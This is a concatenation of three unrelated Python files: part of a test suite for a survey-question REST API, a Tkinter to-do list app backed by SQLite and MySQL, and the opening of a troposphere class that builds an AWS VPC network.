self.db, title='What is your age', short_name='age',
question_type='multiple_choice', author_uuid=uuid.uuid4(),
app_uuid=uuid.uuid4(), content_uuid=uuid.uuid4(),
content_type='page', options=[],
locale='eng_GB')
self.db.flush()
self.age_less_than_18 = self.create_question_option(
self.db, title='<18', question_id=self.question_2.uuid)
self.age_18_to_29 = self.create_question_option(
self.db, title='18-29', question_id=self.question_2.uuid)
self.age_30_to_49 = self.create_question_option(
self.db, title='30-49', question_id=self.question_2.uuid)
self.age_over_50 = self.create_question_option(
self.db, title='50+', question_id=self.question_2.uuid)
self.question_3 = self.create_question(
self.db, title='Which sports do you watch', short_name='sports',
multiple=True, question_type='multiple_choice',
author_uuid=uuid.uuid4(), app_uuid=uuid.uuid4(),
content_uuid=uuid.uuid4(),
content_type='page', options=[],
locale='eng_GB')
self.db.flush()
self.create_question_option(
self.db, title='cricket', question_id=self.question_3.uuid)
self.create_question_option(
self.db, title='rugby', question_id=self.question_3.uuid)
self.create_question_option(
self.db, title='soccer', question_id=self.question_3.uuid)
self.create_question_option(
self.db, title='tennis', question_id=self.question_3.uuid)
self.create_question_option(
self.db, title='other', question_id=self.question_3.uuid)
self.question_4 = self.create_question(
self.db, title='Which country is the best', short_name='country',
multiple=True, question_type='multiple_choice',
author_uuid=uuid.uuid4(), app_uuid=uuid.uuid4(),
content_uuid=uuid.uuid4(),
content_type='page', options=[],
locale='eng_GB')
self.db.flush()
self.country_usa = self.create_question_option(
self.db, title='USA', question_id=self.question_4.uuid)
self.country_canada = self.create_question_option(
self.db, title='Canada', question_id=self.question_4.uuid)
self.country_brazil = self.create_question_option(
self.db, title='Brazil', question_id=self.question_4.uuid)
self.country_kenya = self.create_question_option(
self.db, title='Kenya', question_id=self.question_4.uuid)
self.country_ireland = self.create_question_option(
self.db, title='Ireland', question_id=self.question_4.uuid)
self.db.flush()
self.question_5 = self.create_question(
self.db, title='How old are you', short_name='age',
question_type='free_text', numeric=True, author_uuid=uuid.uuid4(),
app_uuid=uuid.uuid4(), content_uuid=uuid.uuid4(),
content_type='page', options=[],
locale='eng_GB')
self.db.flush()
self.question_5_option = self.create_question_option(
self.db, question_id=self.question_5.uuid)
self.db.flush()
self.db.commit()
def test_uuid(self):
the_uuid = self.question_1._uuid
self.assertEqual(the_uuid, uuid.UUID(self.question_1.uuid))
self.question_1.uuid = self.question_1.uuid
self.assertEqual(the_uuid, self.question_1._uuid)
self.question_1.uuid = uuid.UUID(self.question_1.uuid)
self.assertEqual(the_uuid, self.question_1._uuid)
def test_question_not_found(self):
self.app.get('/questions/%s' % uuid.uuid4(), status=404)
def test_free_text_question(self):
resp = self.app.get(
'/questions/%s' % self.question_1.uuid)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.json_body, self.question_1.to_dict())
def test_multiple_choice_question(self):
resp = self.app.get(
'/questions/%s' % self.question_2.uuid)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.json_body, self.question_2.to_dict())
def test_multiple_choice_question_with_multiple_response(self):
resp = self.app.get(
'/questions/%s' % self.question_3.uuid)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.json_body, self.question_3.to_dict())
def test_edit_title(self):
resp = self.app.put_json(
'/questions/%s' % self.question_1.uuid,
params={
'title': 'What is your name?',
'question_type': 'free_text',
'content_type': 'page',
'locale': 'eng_GB',
'app_uuid': uuid.uuid4().hex,
'author_uuid': uuid.uuid4().hex,
'content_uuid': uuid.uuid4().hex,
})
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.json_body['title'], 'What is your name?')
# test get also returns same data
resp = self.app.get('/questions/%s' % self.question_1.uuid)
self.assertEqual(resp.json_body['title'], 'What is your name?')
def test_invalid_locale_code(self):
resp = self.app.put_json(
'/questions/%s' % self.question_1.uuid,
params={
'title': 'What is your name?',
'question_type': 'free_text',
'content_type': 'page',
'locale': 'unknown',
'app_uuid': uuid.uuid4().hex,
'author_uuid': uuid.uuid4().hex,
'content_uuid': uuid.uuid4().hex,
}, status=400)
self.assertEqual(
resp.json_body['errors'][0]['description'],
"unknown is not a valid locale")
def test_edit_multiple_choice_existing_options(self):
data = {
'title': 'What is your age sir?',
'short_name': 'age',
'question_type': 'multiple_choice',
'content_type': 'page',
'locale': 'eng_GB',
'multiple': False,
'app_uuid': uuid.uuid4().hex,
'author_uuid': uuid.uuid4().hex,
'content_uuid': uuid.uuid4().hex,
'options': [
{'uuid': self.age_less_than_18.uuid, 'title': 'less than 18'},
{'uuid': self.age_18_to_29.uuid, 'title': 'between 18 and 29'},
{'uuid': self.age_30_to_49.uuid, 'title': 'between 30 and 49'},
{'uuid': self.age_over_50.uuid, 'title': 'older than 50'}
]}
resp = self.app.put_json(
'/questions/%s' % self.question_2.uuid, params=data)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.json_body['title'], data['title'])
self.assertEqual(resp.json_body['short_name'], data['short_name'])
self.assertEqual(resp.json_body['multiple'], data['multiple'])
self.assertEqual(
resp.json_body['options'][0]['title'], data['options'][0]['title'])
self.assertEqual(
resp.json_body['options'][1]['title'], data['options'][1]['title'])
self.assertEqual(
resp.json_body['options'][2]['title'], data['options'][2]['title'])
self.assertEqual(
resp.json_body['options'][3]['title'], data['options'][3]['title'])
# test get also returns same data
resp = self.app.get('/questions/%s' % self.question_2.uuid)
self.assertEqual(resp.json_body['title'], data['title'])
self.assertEqual(resp.json_body['short_name'], data['short_name'])
self.assertEqual(resp.json_body['multiple'], data['multiple'])
self.assertEqual(
resp.json_body['options'][0]['title'], data['options'][0]['title'])
self.assertEqual(
resp.json_body['options'][1]['title'], data['options'][1]['title'])
self.assertEqual(
resp.json_body['options'][2]['title'], data['options'][2]['title'])
self.assertEqual(
resp.json_body['options'][3]['title'], data['options'][3]['title'])
def test_edit_multiple_choice_add_new_options(self):
data = {
'title': 'What is your age sir?',
'short_name': 'age',
'question_type': 'multiple_choice',
'content_type': 'page',
'locale': 'eng_GB',
'multiple': False,
'app_uuid': uuid.uuid4().hex,
'author_uuid': uuid.uuid4().hex,
'content_uuid': uuid.uuid4().hex,
'options': [
{'uuid': self.age_less_than_18.uuid, 'title': 'less than 18'},
{'uuid': self.age_18_to_29.uuid, 'title': 'between 18 and 29'},
{'uuid': self.age_30_to_49.uuid, 'title': 'between 30 and 49'},
{'uuid': self.age_over_50.uuid, 'title': 'between 50 and 59'},
{'title': 'between 50 and 59', 'short_name': 'between_50_59'},
{'title': 'older than 60', 'short_name': 'older_than_60'},
]}
resp = self.app.put_json(
'/questions/%s' % self.question_2.uuid, params=data)
self.assertEqual(resp.status_int, 200)
self.assertEqual(
resp.json_body['options'][0]['title'], data['options'][0]['title'])
self.assertEqual(
resp.json_body['options'][1]['title'], data['options'][1]['title'])
self.assertEqual(
resp.json_body['options'][2]['title'], data['options'][2]['title'])
self.assertEqual(
resp.json_body['options'][3]['title'], data['options'][3]['title'])
self.assertEqual(
resp.json_body['options'][4]['title'], data['options'][4]['title'])
self.assertEqual(
resp.json_body['options'][5]['title'], data['options'][5]['title'])
# test get also returns same data
resp = self.app.get('/questions/%s' % self.question_2.uuid)
self.assertEqual(
resp.json_body['options'][0]['title'], data['options'][0]['title'])
self.assertEqual(
resp.json_body['options'][1]['title'], data['options'][1]['title'])
self.assertEqual(
resp.json_body['options'][2]['title'], data['options'][2]['title'])
self.assertEqual(
resp.json_body['options'][3]['title'], data['options'][3]['title'])
self.assertEqual(
resp.json_body['options'][4]['title'], data['options'][4]['title'])
self.assertEqual(
resp.json_body['options'][5]['title'], data['options'][5]['title'])
def test_edit_multiple_choice_invalid_option_uuid(self):
data = {
'title': 'What is your age sir?',
'short_name': 'age',
'question_type': 'multiple_choice',
'content_type': 'page',
'locale': 'eng_GB',
'multiple': False,
'app_uuid': uuid.uuid4().hex,
'author_uuid': uuid.uuid4().hex,
'content_uuid': uuid.uuid4().hex,
'options': [
{'uuid': self.age_less_than_18.uuid, 'title': 'less than 18'},
{'uuid': self.age_18_to_29.uuid, 'title': 'between 18 and 29'},
{'uuid': self.age_30_to_49.uuid, 'title': 'between 30 and 49'},
{'uuid': self.age_over_50.uuid, 'title': 'between 50 and 59'},
{'uuid': 'invaliduuid', 'title': 'between 50 and 59'},
]}
resp = self.app.put_json(
'/questions/%s' % self.question_2.uuid, params=data, status=400)
self.assertEqual(
resp.json_body['errors'][0]['description'],
'Shorter than minimum length 32')
data = {
'title': 'What is your age sir?',
'short_name': 'age',
'question_type': 'multiple_choice',
'content_type': 'page',
'locale': 'eng_GB',
'multiple': False,
'app_uuid': uuid.uuid4().hex,
'author_uuid': uuid.uuid4().hex,
'content_uuid': uuid.uuid4().hex,
'options': [
{'uuid': self.age_less_than_18.uuid, 'title': 'less than 18'},
{'uuid': self.age_18_to_29.uuid, 'title': 'between 18 and 29'},
{'uuid': self.age_30_to_49.uuid, 'title': 'between 30 and 49'},
{'uuid': self.age_over_50.uuid, 'title': 'between 50 and 59'},
{'uuid': 'a' * 40, 'title': 'longer than maximum uuid'},
]}
resp = self.app.put_json(
'/questions/%s' % self.question_2.uuid, params=data, status=400)
self.assertEqual(
resp.json_body['errors'][0]['description'],
'Longer than maximum length 32')
def test_create(self):
data = {
'title': 'What is your name',
'short_name': 'name',
'question_type': 'free_text',
'content_type': 'page',
'locale': 'eng_GB',
'app_uuid': uuid.uuid4().hex,
'author_uuid': uuid.uuid4().hex,
'content_uuid': uuid.uuid4().hex,
}
resp = self.app.post_json(
'/questions', params=data)
self.assertEqual(resp.status_int, 201)
self.assertEqual(resp.json_body['title'], data['title'])
self.assertEqual(resp.json_body['short_name'], data['short_name'])
self.assertEqual(
resp.json_body['question_type'], data['question_type'])
self.assertEqual(resp.json_body['options'][0]['responses_count'], 0)
self.assertEqual(resp.json_body['options'][0]['title'], data['title'])
self.assertEqual(
resp.json_body['options'][0]['short_name'], data['short_name'])
# test get also returns same data
resp = self.app.get(
'/questions/%s' % resp.json_body['uuid'])
self.assertEqual(resp.json_body['title'], data['title'])
self.assertEqual(resp.json_body['short_name'], data['short_name'])
self.assertEqual(
resp.json_body['question_type'], data['question_type'])
self.assertEqual(resp.json_body['multiple'], False)
self.assertEqual(resp.json_body['options'][0]['responses_count'], 0)
self.assertEqual(resp.json_body['options'][0]['title'], data['title'])
self.assertEqual(
resp.json_body['options'][0]['short_name'], data['short_name'])
def test_create_missing_fields(self):
resp = self.app.post_json(
'/questions', params={}, status=400)
self.assertEqual(
resp.json_body['errors'][0]['description'], 'app_uuid is missing')
self.assertEqual(
resp.json_body['errors'][1]['description'],
'author_uuid is missing')
self.assertEqual(
resp.json_body['errors'][2]['description'],
'content_uuid is missing')
self.assertEqual(
resp.json_body['errors'][3]['description'], 'title is missing')
self.assertEqual(
resp.json_body['errors'][4]['description'],
'question_type is missing')
def test_create_invalid_question_type(self):
data = {
'title': 'What is your name',
'short_name': 'name',
'question_type': 'unknown',
'content_type': 'unknown',
'app_uuid': uuid.uuid4().hex,
'author_uuid': uuid.uuid4().hex,
'content_uuid': uuid.uuid4().hex,
}
resp = self.app.post_json(
'/questions', params=data, status=400)
self.assertEqual(
resp.json_body['errors'][0]['description'],
'"unknown" is not one of free_text, multiple_choice')
def test_create_multiple_choice_invalid(self):
# No options specified
data = {
'title': 'What is your name',
'short_name': 'name',
'question_type': 'multiple_choice',
'content_type': 'page',
'locale': 'eng_GB',
'app_uuid': uuid.uuid4().hex,
'author_uuid': uuid.uuid4().hex,
'content_uuid': uuid.uuid4().hex,
}
resp = self.app.post_json(
'/questions', params=data, status=400)
self.assertEqual(
resp.json_body['errors'][0]['description'],
'Atleast 2 options are required')
# Less than 2 options specified
data = {
'title': 'What is your age',
'short_name': 'age',
'question_type': 'multiple_choice',
'content_type': 'page',
'locale': 'eng_GB',
'options': [{'title': 'very old'}],
'app_uuid': uuid.uuid4().hex,
'author_uuid': uuid.uuid4().hex,
'content_uuid': uuid.uuid4().hex,
}
resp = self.app.post_json(
'/questions', params=data, status=400)
self.assertEqual(
resp.json_body['errors'][0]['description'],
'Atleast 2 options are required')
def test_create_multiple_choice(self):
data = {
'title': 'What is your age',
'short_name': 'age',
'question_type': 'multiple_choice',
'content_type': 'page',
'locale': 'eng_GB',
'multiple': True,
'app_uuid': uuid.uuid4().hex,
'author_uuid': uuid.uuid4().hex,
'content_uuid': uuid.uuid4().hex,
'options': [
{'title': '<16', 'short_name': 'yonger_than_16'},
{'title': '16-29', 'short_name': '17_to_29'},
{'title': '30-50', 'short_name': '30_to_50'},
{'title': '>50', 'short_name': 'older_than_50'},
]}
resp = self.app.post_json('/questions', params=data, status=201)
self.assertEqual(resp.json_body['title'], data['title'])
self.assertEqual(resp.json_body['short_name'], data['short_name'])
self.assertEqual(
resp.json_body['question_type'], data['question_type'])
self.assertEqual(resp.json_body['multiple'], True)
self.assertEqual(resp.json_body['options'][0]['responses_count'], 0)
self.assertEqual(resp.json_body['options'][0]['title'], '<16')
self.assertEqual(
resp.json_body['options'][0]['short_name'], 'yonger_than_16')
self.assertEqual(len(resp.json_body['options']), 4)
# test get also returns same data
resp = self.app.get(
'/questions/%s' % resp.json_body['uuid'])
self.assertEqual(resp.json_body['title'], data['title'])
self.assertEqual(resp.json_body['short_name'], data['short_name'])
self.assertEqual(
resp.json_body['question_type'], data['question_type'])
self.assertEqual(resp.json_body['multiple'], True)
self.assertEqual(resp.json_body['options'][0]['responses_count'], 0)
self.assertEqual(resp.json_body['options'][0]['title'], '<16')
self.assertEqual(
resp.json_body['options'][0]['short_name'], 'yonger_than_16')
self.assertEqual(len(resp.json_body['options']), 4)
def test_delete_options(self):
data = {
'title': 'Which country is the best',
'short_name': 'country',
'question_type': 'multiple_choice',
'content_type': 'page',
'locale': 'eng_GB',
'multiple': True,
'app_uuid': uuid.uuid4().hex,
'author_uuid': uuid.uuid4().hex,
'content_uuid': uuid.uuid4().hex,
'options': [
{'uuid': self.country_usa.uuid, 'title': 'United States of A'},
{'uuid': self.country_canada.uuid, 'title': 'Republic of C'},
{'title': 'South Africa', 'short_name': 'rsa'},
{'title': 'Australia', 'short_name': 'australia'},
]}
resp = self.app.put_json(
'/questions/%s' % self.question_4.uuid, params=data)
options = resp.json_body['options']
self.assertEqual(resp.json_body['title'], data['title'])
self.assertEqual(resp.json_body['short_name'], data['short_name'])
self.assertEqual(options[0]['title'], 'United States of A')
self.assertEqual(options[1]['title'], 'Republic of C')
self.assertEqual(options[2]['title'], 'South Africa')
self.assertEqual(options[3]['title'], 'Australia')
self.assertEqual(len(resp.json_body['options']), 4)
# test get also returns same data
resp = self.app.get(
'/questions/%s' % resp.json_body['uuid'])
options = resp.json_body['options']
self.assertEqual(resp.json_body['title'], data['title'])
self.assertEqual(resp.json_body['short_name'], data['short_name'])
self.assertEqual(options[0]['title'], 'United States of A')
self.assertEqual(options[1]['title'], 'Republic of C')
self.assertEqual(options[2]['title'], 'South Africa')
self.assertEqual(options[3]['title'], 'Australia')
self.assertEqual(len(resp.json_body['options']), 4)
def test_numeric_free_text_question(self):
resp = self.app.get(
'/questions/%s' % self.question_5.uuid)
self.assertEqual(resp.json_body, self.question_5.to_dict())
|
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from Tkinter import *
from ttk import Style
import platform
import tkMessageBox
if platform.system() != "windows":
try:
import ImageTk, Image
except ImportError:
tkMessageBox.showerror('Error!', 'Python Imaging Library (PIL) is required!')
exit(1)
else:
try:
from PIL import ImageTK, Image
except ImportError:
tkMessageBox.showerror('Error!', 'Python Imaging Library (PIL) is required!')
exit(1)
from db import *
import datetime as dt
import webbrowser
import urllib
import cStringIO
class Api(object):
"""API Setting"""
def __init__(self, api_file="api.txt"):
"""
@param txt A API filename (use api.txt) as a default
"""
self.api_file = api_file
fo = open(self.api_file, "r")
self.api = StringVar()
fo.seek(0)
if fo.read(1):
fo.seek(0)
self.api.set(fo.read())
fo.close()
def set_api(self, value):
"""
Save API Key to file
@param value A user's API Key
"""
fo = open(self.api_file, "w")
fo.write(value)
fo.close()
self.api.set(value)
def get_api(self):
"""Get User's API Key"""
return self.api.get()
class Task(Frame):
"""Task card"""
def __init__(self, parent, id, title, message, task_type, datetime, window):
if datetime == '' or datetime == ' :00':
Frame.__init__(self, parent, bg="white")
self.title1 = Label(self, text=title, bg='white', justify=LEFT, wraplength=220, font="Arial 14")
self.datetime1 = Label(self, text='', bg='white', font="Arial 10")
else:
if dt.datetime.strptime(datetime, '%Y-%m-%d %H:%M:%S') > dt.datetime.now():
Frame.__init__(self, parent, bg="white")
self.title1 = Label(self, text=title, bg='white', justify=LEFT, wraplength=220, font="Arial 14")
self.datetime1 = Label(self, text=datetime, bg='white', font="Arial 10")
else:
Frame.__init__(self, parent, bg="white")
self.title1 = Label(self, text=title, bg='white', justify=LEFT, wraplength=220, font="Arial 14")
self.datetime1 = Label(self, text=datetime, bg='white', font="Arial 10", fg="red")
if task_type == 'text':
self.message1 = Label(self, text=message, bg="white", justify=LEFT, wraplength=220, font="Arial 10")
elif task_type == 'list':
message = message.split(',')
out = ''
for data in message:
out += '- ' + data + '\n'
self.message1 = Label(self, text=out, bg="white", justify=LEFT, wraplength=220, font="Arial 10")
elif task_type == "link":
self.message1 = Label(self, text=message, bg="white", fg="blue", justify=LEFT, wraplength=220, font="Arial 10")
self.message1.bind("<Button-1>", lambda event, link=message: self.open_link(event, link))
else:
web_sock = urllib.urlopen(message)
imgdata = cStringIO.StringIO(web_sock.read())
img_ori = Image.open(imgdata)
resize = img_ori.resize((250, 250), Image.ANTIALIAS)
img = ImageTk.PhotoImage(resize)
self.message1 = Label(self, image=img, bg="white", justify=LEFT, width=250)
self.message1.image = img
delete_img = ImageTk.PhotoImage(Image.open("del.png"))
edit_img = ImageTk.PhotoImage(Image.open("edit.png"))
self.id = id
self.title = title
self.message = message
self.datetime = datetime
self.task_type = task_type
self.window = window
self.delete = Label(self, image=delete_img, bg='#e74c3c', justify=LEFT)
self.delete.image = delete_img
self.edit = Label(self, image=edit_img, bg='#2ecc71', justify=LEFT)
self.edit.image = edit_img
self.delete.bind('<Button-1>', self.delete_task)
self.delete.bind("<Enter>", lambda event, h=self.delete: h.configure(bg="#B83C30"))
self.delete.bind("<Leave>", lambda event, h=self.delete: h.configure(bg="#e74c3c"))
self.edit.bind('<Button-1>', self.edit_task)
self.edit.bind("<Enter>", lambda event, h=self.edit: h.configure(bg="#25A65C"))
self.edit.bind("<Leave>", lambda event, h=self.edit: h.configure(bg="#2ecc71"))
self.delete.pack(in_=self, anchor=NE, side=RIGHT)
self.edit.pack(in_=self, anchor=NE, side=RIGHT)
self.title1.pack(in_=self, anchor=W, fill=Y)
self.message1.pack(in_=self, anchor=SW, fill=Y)
self.datetime1.pack(in_=self, anchor=SE)
def delete_task(self, e):
mysql = MySQL()
sqlite = SQLite()
if self.datetime == '':
sqlite.delete_task(self.id)
else:
remote_id = sqlite.get_remote_id(self.id)
mysql.delete_task(remote_id)
sqlite.delete_task(self.id)
self.destroy()
def edit_task(self, e):
data = {
'title': StringVar(),
'message': StringVar(),
'date': StringVar(),
'time': StringVar()
}
data['title'].set(self.title)
data['message'].set(self.message)
if self.datetime == '':
data['date'].set('')
data['time'].set('')
else:
data['date'].set(self.datetime.split()[0])
data['time'].set(self.datetime.split()[1][:-3])
self.delete_task(e)
self.window.new_task(self.task_type, data, 'Edit Task')
def open_link(self, event, link):
webbrowser.open_new(link)
class App(Frame):
"""docstring for App"""
def paste(self):
"""Override Paste Shortcut"""
self.entry.event_generate('<Control-v>')
def cut(self):
"""Override Cut Shortcut"""
self.entry.event_generate('<Control-x>')
def copy(self):
"""Override Copy Shortcut"""
self.entry.event_generate('<Control-c>')
def save(self):
"""Save User's API Key in Setting"""
api = Api()
api.set_api(self.api_entry.get())
self.s.destroy()
self.clear_frame()
def setting(self):
"""Create Setting Window"""
api = Api()
val = StringVar()
val.set(api.get_api())
self.s = Toplevel(self, padx=10, pady=10)
self.s.title("Update API Key")
self.s.resizable(0, 0)
self.api_label = Label(self.s, text="API Key")
self.api_label.grid(row=0, column=0, sticky=W, ipady=10)
self.api_entry = Entry(self.s, textvariable=val, width=40)
self.api_entry.grid(row=0, column=1, columnspan=2, sticky=W + E, ipady=3)
self.save_btn = Button(self.s, text="Save", padx=10, pady=5, command=self.save)
self.save_btn.grid(row=1, column=0, columnspan=3, sticky=W + E, pady=5)
def new_task(self, task_type, values=dict(), btn='Add Task'):
"""
Create "Add a task" Window
@param task_type Get type of task
value A dict of task data (title, message, date, time)
btn Text display in Button
"""
if values == {}:
values['title'] = StringVar().set('')
values['message'] = StringVar().set('')
values['date'] = StringVar()
values['date'].set('2014-10-30')
values['time'] = StringVar()
values['time'].set('13:37')
self.task_type = task_type
self.t = Toplevel(self, padx=10, pady=10)
self.t.title("Add a task")
self.t.resizable(0, 0)
self.title_label = Label(self.t, text="Title")
self.title_label.grid(row=0, column=0, sticky=W, ipady=10)
self.title = Entry(self.t, textvariable=values['title'])
self.title.grid(row=0, column=1, columnspan=2, sticky=W + E, ipady=3)
self.message_label = Label(self.t, text="Message")
self.message_label.grid(row=1, column=0, sticky=W, ipady=10)
self.message = Entry(self.t, textvariable=values['message'])
self.message.grid(row=1, column=1, columnspan=2, sticky=W + E, ipady=3)
self.datetime_label = Label(self.t, text="Datetime")
self.datetime_label.grid(row=2, column=0, sticky=W, ipady=10)
self.datetime_date = Entry(self.t, textvariable=values['date'])
self.datetime_date.grid(row=2, column=1, sticky=W, ipady=3)
self.datetime_time = Entry(self.t, textvariable=values['time'])
self.datetime_time.grid(row=2, column=2, sticky=W, ipady=3)
self.l = Button(self.t, padx=10, pady=5)
self.l["text"] = btn
self.l["command"] = self.get_new_task
self.l.grid(row=3, columnspan=3, sticky=N + E + W + S, pady=5)
def get_new_task(self):
"""Get data from "Add a task" Window and add task"""
title = self.title.get()
message = self.message.get()
task_type = self.task_type
date = self.datetime_date.get()
time = self.datetime_time.get()
self.add_task(title, message, task_type, date, time)
self.t.destroy()
def create_widget(self):
"""Create main window program"""
self.row = 0
self.columnconfigure(0, pad=0)
self.columnconfigure(1, pad=0)
self.columnconfigure(2, pad=0)
self.columnconfigure(3, pad=0)
self.new_text = Button(self.frame, padx=25, pady=10, bg="white", borderwidth=0)
self.new_text["text"] = "Text"
self.new_text["command"] = lambda: self.new_task("text")
self.new_text.bind("<Enter>", lambda event, h=self.new_text: h.configure(bg="#cccccc"))
self.new_text.bind("<Leave>", lambda event, h=self.new_text: h.configure(bg="#ffffff"))
self.new_text.grid(row=0, sticky=N + S + E + W, column=0, pady=(0, 2))
self.new_list = Button(self.frame, padx=25, pady=10, bg="white", borderwidth=0)
self.new_list["text"] = "List"
self.new_list["command"] = lambda: self.new_task("list")
self.new_list.bind("<Enter>", lambda event, h=self.new_list: h.configure(bg="#cccccc"))
self.new_list.bind("<Leave>", lambda event, h=self.new_list: h.configure(bg="#ffffff"))
self.new_list.grid(row=0, sticky=N + S + E + W, column=1, pady=(0, 2))
self.new_link = Button(self.frame, padx=25, pady=10, bg="white", borderwidth=0)
self.new_link["text"] = "Link"
self.new_link["command"] = lambda: self.new_task("link")
self.new_link.bind("<Enter>", lambda event, h=self.new_link: h.configure(bg="#cccccc"))
self.new_link.bind("<Leave>", lambda event, h=self.new_link: h.configure(bg="#ffffff"))
self.new_link.grid(row=0, sticky=N + S + E + W, column=2, pady=(0, 2))
self.new_file = Button(self.frame, padx=25, pady=10, bg="white", borderwidth=0)
self.new_file["text"] = "File"
self.new_file["command"] = lambda: self.new_task("file")
self.new_file.bind("<Enter>", lambda event, h=self.new_file: h.configure(bg="#cccccc"))
self.new_file.bind("<Leave>", lambda event, h=self.new_file: h.configure(bg="#ffffff"))
self.new_file.grid(row=0, sticky=N + S + E + W, column=3, pady=(0, 2))
self.pack()
self.get_task()
def clear_frame(self):
"""Clear main window and refresh task"""
for child in self.frame.winfo_children():
child.destroy()
self.create_widget()
def create_frame(self, title, message, task_type, datetime, id=''):
"""Create Task Frame on main window"""
self.row += 1
Task(self.frame, id, title, message, task_type, datetime, self).grid(row=self.row, columnspan=4, sticky=W + E, pady=(0, 2))
def get_task(self):
"""Get All User's Task"""
api = Api()
self.api = api.get_api()
for row in self.sqlite.get_task(self.api):
print row
self.create_frame(row[1], row[2], row[3], row[4], id=row[0])
print '---------------------------------------------------------------'
def add_task(self, title, message, task_type, date, time):
"""Add task to database"""
print title, message, task_type, date, time
print '---------------------------------------------------------------'
self.data = {
'api': self.api,
'title': title,
'message': message,
'task_type': task_type,
}
if (date == "" and time == "") or (date == '2014-10-30' and time == '13:37'):
self.data['time'] = ""
self.data['remote_id'] = 0
else:
self.data['time'] = date + ' ' + time + ':00'
self.data['remote_id'] = self.mysql.insert_task(self.data)
task_id = self.sqlite.insert_task(self.data)
self.create_frame(self.data['title'], self.data['message'], self.data['task_type'], self.data['time'], task_id)
def OnFrameConfigure(self, event):
'''Reset the scroll region to encompass the inner frame'''
self.canvas.configure(scrollregion=self.canvas.bbox("all"))
def __init__(self, master=None):
"""create database connection and init App frame and Canvas"""
self.mysql = MySQL()
self.sqlite = SQLite('db.db')
api = Api()
self.api = api.get_api()
Frame.__init__(self, master)
Style().configure('.', font=('Arial', 10))
self.canvas = Canvas(master, borderwidth=0, background="white", width=320)
self.frame = Frame(self.canvas, background="#cccccc")
self.vsb = Scrollbar(master, orient="vertical", command=self.canvas.yview)
self.canvas.configure(yscrollcommand=self.vsb.set)
self.vsb.pack(side="right", fill="y")
self.canvas.pack(side="left", fill="both")
self.canvas.create_window((0, 0), window=self.frame, anchor=NW)
self.frame.bind("<Configure>", self.OnFrameConfigure)
self.menubar = Menu(self.master)
self.master.config(menu=self.menubar)
filemenu = Menu(self.menubar, tearoff=0)
filemenu.add_command(label="Setting", command=self.setting)
filemenu.add_command(label="Quit", command=quit)
self.menubar.add_cascade(label="File", menu=filemenu)
self.create_widget()
def main():
"""init program"""
root = Tk()
root.resizable(width=FALSE, height=FALSE)
root.geometry("320x600+150+150")
root.title('To-do Bullet (Dev.)')
app = App(master=None)
app.mainloop()
root.destroy()
main()
|
|
#!/usr/bin/python3
from amazonia.classes.hosted_zone import HostedZone
from amazonia.classes.single_instance import SingleInstance
from amazonia.classes.single_instance_config import SingleInstanceConfig
from amazonia.classes.sns import SNS
from amazonia.classes.subnet import Subnet
from amazonia.classes.util import get_cf_friendly_name
from troposphere import Ref, Template, ec2, Tags, Join, GetAtt
from troposphere.ec2 import EIP, NatGateway
class Network(object):
def __init__(self, keypair, availability_zones, vpc_cidr, home_cidrs, public_cidr, jump_image_id,
jump_instance_type, nat_image_id, nat_instance_type, public_hosted_zone_name, private_hosted_zone_name,
iam_instance_profile_arn, owner_emails, nat_highly_available, ec2_scheduled_shutdown, owner):
"""
Create a vpc, nat, jumphost, internet gateway, public/private route tables, public/private subnets
and collection of Amazonia units
AWS CloudFormation -
http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-ec2-instance.html
Troposphere - https://github.com/cloudtools/troposphere/blob/master/troposphere/ec2.py
:param keypair: ssh keypair to be used throughout stack
:param availability_zones: availability zones to use
:param vpc_cidr: cidr pattern for vpc
:param home_cidrs: a list of tuple objects of 'title'(0) and 'ip'(1) to be used
to create ingress rules for ssh to jumpboxes from home/office/company premises
:param public_cidr: a cidr to be treated as a public location. (eg 0.0.0.0/0)
:param jump_image_id: AMI for jumphost
:param jump_instance_type: instance type for jumphost
:param nat_image_id: AMI for nat
:param nat_instance_type: instance type for nat
:param public_hosted_zone_name: A string containing the name of the Route 53 hosted zone to create public record
sets in.
:param private_hosted_zone_name: name of private hosted zone to create
:param iam_instance_profile_arn: the ARN for an IAM instance profile that enables cloudtrail access for logging
:param owner_emails: a list of emails for owners of this stack. Used for alerting.
:param nat_highly_available: True/False for whether or not to use a series of NAT gateways or a single NAT
:param ec2_scheduled_shutdown: True/False for whether to schedule shutdown for EC2 instances outside work hours
"""
super(Network, self).__init__()
# set parameters
self.keypair = keypair
self.availability_zones = availability_zones
self.vpc_cidr = vpc_cidr
self.home_cidrs = home_cidrs
self.public_cidr = public_cidr
self.public_hosted_zone_name = public_hosted_zone_name
self.private_hosted_zone_name = private_hosted_zone_name
self.jump_image_id = jump_image_id
self.jump_instance_type = jump_instance_type
self.nat_image_id = nat_image_id
self.nat_instance_type = nat_instance_type
self.owner_emails = owner_emails if owner_emails else []
self.nat_highly_available = nat_highly_available
self.iam_instance_profile_arn = iam_instance_profile_arn
self.ec2_scheduled_shutdown = ec2_scheduled_shutdown
self.owner = owner
# initialize object references
self.template = Template()
self.private_subnets = []
self.public_subnets = []
self.public_subnet_mapping = {}
self.vpc = None
self.private_hosted_zone = None
self.internet_gateway = None
self.gateway_attachment = None
self.public_route_table = None
self.private_route_tables = {}
self.nat = None
self.nat_gateways = []
self.jump = None
self.private_route = None
self.public_route = None
self.sns_topic = None
# Add VPC and Internet Gateway with Attachment
vpc_name = 'Vpc'
self.vpc = Ref(self.template.add_resource(
ec2.VPC(
vpc_name,
CidrBlock=self.vpc_cidr['cidr'],
EnableDnsSupport='true',
EnableDnsHostnames='true',
Tags=Tags(
Name=Join('', [Ref('AWS::StackName'), '-', vpc_name])
)
)))
self.private_hosted_zone = HostedZone(self.template, self.private_hosted_zone_name, vpcs=[self.vpc])
ig_name = 'Ig'
self.internet_gateway = self.template.add_resource(
ec2.InternetGateway(ig_name,
Tags=Tags(Name=Join('', [Ref('AWS::StackName'), '-', ig_name])),
DependsOn=vpc_name))
self.gateway_attachment = self.template.add_resource(
ec2.VPCGatewayAttachment(self.internet_gateway.title + 'Atch',
VpcId=self.vpc,
InternetGatewayId=Ref(self.internet_gateway),
DependsOn=self.internet_gateway.title))
# Add Public Route Table
public_rt_name = 'PubRouteTable'
self.public_route_table = self.template.add_resource(
